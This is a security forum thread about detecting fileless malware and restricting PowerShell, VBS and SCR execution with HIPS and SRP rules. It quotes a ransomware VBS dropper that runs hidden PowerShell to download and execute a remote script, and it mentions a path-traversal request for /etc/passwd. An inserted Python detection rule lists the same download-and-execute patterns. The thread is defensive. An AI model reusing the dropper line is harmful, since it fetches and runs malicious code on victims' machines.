In memory fileless malware detection ..... any antimalware software?

Discussion in 'malware problems & news' started by aigle, Sep 10, 2015.

  1. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    I have a question for security experts here, esp. the experts directly related to a commercial security software. Is there any antimalware that can detect in-memory fileless malware like Bedep, proactively or on the basis of signatures?

    No antimalware scanner scans memory in real time (BOClean was an exception) and most HIPS are blind to the fileless malware injection, so I guess the answer is: None.
     
  2. TairikuOkami

    TairikuOkami Registered Member

    Joined:
    Oct 10, 2005
    Posts:
    2,509
    Location:
    Slovakia
  3. Techwiz

    Techwiz Registered Member

    Joined:
    Jan 5, 2012
    Posts:
    539
    Location:
    United States
    Just started learning about powershell commands yesterday, but I thought I'd add in case anyone didn't know that powershell.exe is merely an interface. Blocking access to it will not prevent attackers from exploiting this resource on a secure system. Thanks for sharing this, as this isn't an attack vector that I have a lot of experience with. The whitepaper was informative.
     
  4. TairikuOkami

    TairikuOkami Registered Member

    Joined:
    Oct 10, 2005
    Posts:
    2,509
    Location:
    Slovakia
    If you uninstall it, it cannot be used. I cannot use PowerShell scripts because of that. Removing those directories should do the trick as well.

    C:\Program Files (x86)\WindowsPowerShell
    C:\Program Files\WindowsPowerShell
    C:\Windows\Sysnative\WindowsPowerShell
    C:\Windows\SysWOW64\WindowsPowerShell
     
    Last edited: Sep 11, 2015
  5. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    2,969
    Location:
    U.S.A.
    Excerpt from the Symantec article:

    It uses the PowerShell program along with an embedded PowerShell script to load a DLL into memory which serves as a “Watchdog” to ensure that Poweliks remains installed on the compromised computer.

    So monitoring PowerShell usage, using a HIPS rule for example to monitor its start-up, will detect Poweliks activity. It is not recommended that PowerShell be removed since certain Microsoft utilities like "Fix-it" plus various OS diagnostics use PowerShell. Also creating HIPS rules to monitor registry keys Poweliks uses is recommended.
     
  6. Gullible Jones

    Gullible Jones Registered Member

    Joined:
    May 16, 2013
    Posts:
    1,461
    Oh jeeze, that is an ugly slideshow...

    @itman

    From my reading of the PDF, it looks like the zero-day exploit is used to escalate privileges and invoke the bad executable, in one stroke; which may mean that it could at least theoretically fool a HIPS.

    BTW: I seriously recommend everyone take a look at that exploit, it's a really embarrassing one. It's like vulnerabilities in ancient UNIX web servers... you know, "GET /../../../../../../../etc/passwd". That kind of thing. Except in this case, it seems to be running an EXE with admin privileges instead. Yay!
     
  7. RJK3

    RJK3 Registered Member

    Joined:
    Apr 4, 2011
    Posts:
    855
    Could you explain this further? Do you know what method CryptoPrevent uses to block access to powershell?
     
  8. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    2,969
    Location:
    U.S.A.
    Depends on the HIPS and the way you set it up. Some HIPS have options like "allow all signed processes" for example. If the malware is signed and that option enabled then yes, you're screwed.

    I use Eset's HIPS and it doesn't care about privileges and the like, it will stop system processes or malware equally from target process access. In other words, I have to set rules for anything I want to allow modification to a defined target process.
     
  9. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    2,969
    Location:
    U.S.A.
    I don't believe that CryptoPrevent blocks access to PowerShell. Rather it blocks write/execute access to known directories where crypto malware downloads to. It also protects user directories like My Documents, My Pictures, etc. from being encrypted.
     
  10. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    2,969
    Location:
    U.S.A.
    Found this over at bleepingcomputer.com. Great example of a malicious use of PowerShell via a .vbs script execution. What the code is doing is opening PowerShell in hidden mode and overriding its default policy not to allow script execution. Again PowerShell has to start to execute this script. So a HIPS rule to monitor its start-up would prevent this infection.

    El-Polocker is distributed through fake DHL penalty notices that contain a link to a zip file hosted on DropBox that contains a VBS file called Penalty.vbs. If this file is run it will download and execute a PowerShell script that is the main component of the El-Polocker ransomware.

    Set oShell =CreateObject("Shell.Application")

    oShell.ShellExecute"powershell","-WindowStyle Hidden -sta -executionpolicy bypass if (1 -eq 1){IEX ((New-Object Net.WebClient).DownloadString('http://193.xxx.xxx.xxx/wall/encrypt.ps1'));}","","",1

    Once the PowerShell script is launched it will inject the C:\1\Reflect.dll into Explorer.exe using a script from PowerSploit and then executes the DLL’s VoidFunc function.

    Ref.
    http://www.bleepingcomputer.com/for...hicken-as-it-encrypts-your-drives-and-shares/
     
  11. TairikuOkami

    TairikuOkami Registered Member

    Joined:
    Oct 10, 2005
    Posts:
    2,509
    Location:
    Slovakia
    So disabling VBS will do as well, it is even simpler and it can be done only temporarily (no restart necessary), until VBS is needed.
     
  12. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    2,969
    Location:
    U.S.A.
    One other item that needs mentioning. Besides what I mentioned previously about it not being advisable to delete the default version of PowerShell in the Windows sub-directory, it will not protect you from its use. There is malware in existence that will actually download PowerShell if it detects it is not installed.

    Additionally, there are multiple versions of PowerShell besides the default version installed by the OS. So you really want your HIPS rule to alert you for the start-up of any .exe located in the PowerShell Windows sub-directory.
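    The launch pattern quoted in post 10 (a script host starting a hidden PowerShell with an execution-policy bypass that downloads and runs code) and the advice just above to watch any executable started from a WindowsPowerShell directory can be expressed as one process-creation triage rule. The following is an added example, not code from this thread or from any product named in it; the event records are constructed in the shape of Sysmon process-creation fields, the IP stays masked as in the post, and the weights and threshold are assumptions.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style fields). The first
# one mirrors the Penalty.vbs launch quoted in the thread, IP masked as in the post.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -WindowStyle Hidden -sta -executionpolicy bypass if (1 -eq 1)"
                "{IEX ((New-Object Net.WebClient).DownloadString('http://193.xxx.xxx.xxx/wall/encrypt.ps1'));}"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

POWERSHELL_DIR = re.compile(r"\\WindowsPowerShell\\", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# (pattern over the command line, weight, label); each is a trait of the quoted launch
INDICATORS = [
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"-e(xecutionpolicy|p)?\s+bypass", re.I), 2, "execution policy bypass"),
    (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2, "Invoke-Expression"),
    (re.compile(r"Net\.WebClient|Download(String|File)", re.I), 3, "web download"),
    (re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3, "encoded command"),
]

def score_event(ev):
    """Return (score, reasons) for one process-creation record."""
    image_name = ev["image"].rsplit("\\", 1)[-1].lower()
    parent_name = ev["parent"].rsplit("\\", 1)[-1].lower()
    score, reasons = 0, []
    # Note *any* executable started from a WindowsPowerShell directory, not only
    # powershell.exe, since additional PowerShell versions may be installed.
    if POWERSHELL_DIR.search(ev["image"]):
        score += 1
        reasons.append(f"started from WindowsPowerShell dir ({image_name})")
    if parent_name in SCRIPT_HOSTS:           # a .vbs/.js host spawned the process
        score += 3
        reasons.append(f"parent is script host {parent_name}")
    for rx, weight, label in INDICATORS:
        if rx.search(ev["cmdline"]):
            score += weight
            reasons.append(label)
    return score, reasons

def triage(events, threshold=5):
    """Return (score, image, reasons) for records at or above threshold, highest first."""
    hits = [(s, ev["image"], r) for ev in events for s, r in [score_event(ev)] if s >= threshold]
    return sorted(hits, key=lambda h: h[0], reverse=True)
```

    A plain scheduled script started from Explorer scores only the directory point, so it stays below the threshold while the quoted launch scores on every indicator.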
     
  13. amarildojr

    amarildojr Registered Member

    Joined:
    Aug 8, 2013
    Posts:
    1,989
    Location:
    Brasil
    Way more important than detecting a malware already in-memory is not allowing it to run in the first place.

    If the malware is running then your security is poorly implemented, and once a computer has been compromised it cannot be trusted anymore, unless the hard drive has been "zeroed" and all firmware verified to be legit (like BIOS, router firmware, etc.).

    EMET 5.2 (max settings) + Sandboxie + Comodo Firewall/HIPS/Sandbox + malwarebytesPRO + non-admin account + a good AV engine (like Avira's) should stop nearly any malware from executing.
     
  14. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,085
    Would VBS and PS1 set in designated file types in SRP stop it?
     
  15. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    2,969
    Location:
    U.S.A.
    One thing that could be done using SRP would be to set PowerShell to run only under admin privileges. Assuming that you are running as default limited admin and you have UAC set to the highest level, you will at least get a UAC prompt when PowerShell tries to execute. This is only valid if the malware is not an exploit and has not already elevated privileges.

    VBS scripts are a different issue since many processes use them. Actually a lot of malware like I posted above will drop a .vbs script in the registry startup areas. This way it can escape detection by a lot of AVs by running when the system boots. What I have done is create a HIPS rule to monitor wscript.exe creating/modifying any startup registry keys. Many HIPS already have default rules to monitor modification of registry startup keys. Also most behavior blockers will detect a malware process attempting to modify registry areas.

    And then there are Python scripts ................................ :eek:
     
  16. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,085
    I tried to run VBS and PS1 from non white-listed location and it got blocked by SRP. Since those files can't be dropped to white-listed location without UAC prompt, this should be fine.
    I use SRP for all users and disable it when needed.
     
  17. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    2,969
    Location:
    U.S.A.
    I believe .ps*1 where * can be "d", "m", etc. are also valid PowerShell extensions.

    -EDIT-
    Also, PowerShell has to run from one of these directories in Win 7, for example, due to the .dlls, etc. it needs: C:\Windows\System32\WindowsPowerShell\v1.0 or C:\Windows\SysWOW64\WindowsPowerShell\v1.0.

    Finally, to test PowerShell SRP policy you need to set the execution policy to something other than the default Restricted value: https://technet.microsoft.com/en-us/library/hh849812.aspx. In Restricted mode, all script execution is blocked. Make sure you set it back to Restricted mode after testing.
     
    Last edited: Sep 15, 2015
  18. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    2,969
    Location:
    U.S.A.
    Here's another way to harness PowerShell if you're using Win 8. Take note of the text I highlighted in red.

    -EDIT- You can download and run Powershell v3 on WIN 7 SP1. You need both Windows Management Framework 3.0 and .Net Framework 4.

    PowerShell v3 PSLockdownPolicy


    In PowerShell v3 a feature that was added was the __PSLockDownPolicy environment variable, which allows control of the object types that can be used and created in PowerShell. This is used by Windows 8 RT to lock down the PowerShell environment. Sadly Microsoft has not documented or made any information publicly available officially on the levels that can be set and what each of the levels can do. This does not stop us from using it. When used, the constrained mode will block most post-exploitation scripts and commands I have seen in publicly available toolkits, so I would recommend it as an extra lockdown step you can take for your hosts that use PowerShell v3. Now do take into consideration that this will also block some modules and legitimate scripts from running, so do test and be careful.

    To use this we can create a new group policy and choose in it Computer Configuration –> Preferences –> Windows Settings –> Environment

    Create a new entry for an Environment Variable and set it to Update so if not created it will and if it has another value it will change it back. Set it to __PSLockdownpolicy and set the value to 4

    You can click on OK and then Apply, then link the policy to any OU you want and use WMI filters to control on which hosts it is applied. Now you should use this in conjunction with WMI filters so as to target only those systems where you have deployed PowerShell v3. Again, like with AppLocker and SRP, if the user is able to run PowerShell with administrative privileges he may be able to change the variable value for the current session, bypassing the control, but it will more than likely block most automated tools out there. Thanks to Matt Graeber for recommending the use of the variable and helping me test what scenarios it would apply to.
     
    Last edited: Sep 15, 2015
  19. Mister X

    Mister X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    1,774
    Location:
    Mexico
    I use AppGuard which has memory protection.
     
  20. Kobayashi maru

    Kobayashi maru Registered Member

    Joined:
    Nov 7, 2009
    Posts:
    124
    Location:
    Drivin' all night my hands wet on the wheel....
    Even so-called file-less memory-loaded images need permission to do anything. I don't see what the fuss is about.
     
  21. Gullible Jones

    Gullible Jones Registered Member

    Joined:
    May 16, 2013
    Posts:
    1,461
    @Kobayashi maru

    In this case, only the persistence mechanism is file-less. So yeah, kind of a misnomer. File-less delivery would be another matter.
     
  22. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    2,969
    Location:
    U.S.A.
    Here's another extension that is a favorite for crypto malware:

    The .SCR extension can be given to .EXE files to detour any restrictions placed on EXE files by antivirus programs or malware.
    And someone over at Spiceworks came up with a solution using SRP:

    To do this I created one path rule for *.scr files, with Security Level of Disallowed, and then another for %SystemRoot%\System32\*.scr with Security Level of Unrestricted, and this does exactly what I need.
    If your OS is x64, then you would also want to add an unrestricted rule for the SysWOW64 directory.
     
  23. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,085
    Thanks. I already have SCR blacklisted and also most other executable and dangerous file extensions. I usually follow this guide, when setting up SRP: http://www.mechbgon.com/srp/
     
  24. RJK3

    RJK3 Registered Member

    Joined:
    Apr 4, 2011
    Posts:
    855
    I looked again and you're right. It was bcdedit.exe I was thinking of re: CryptoPrevent.
     
  25. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    2,969
    Location:
    U.S.A.
    Personally I prefer the use of HIPS over SRP. With an "ask" HIPS rule, I will get an alert plus the option to allow or deny. This way, software installers that use AppData directories for example aren't "borked." Flash Player updates for example will run a .exe from the AppData directory.
     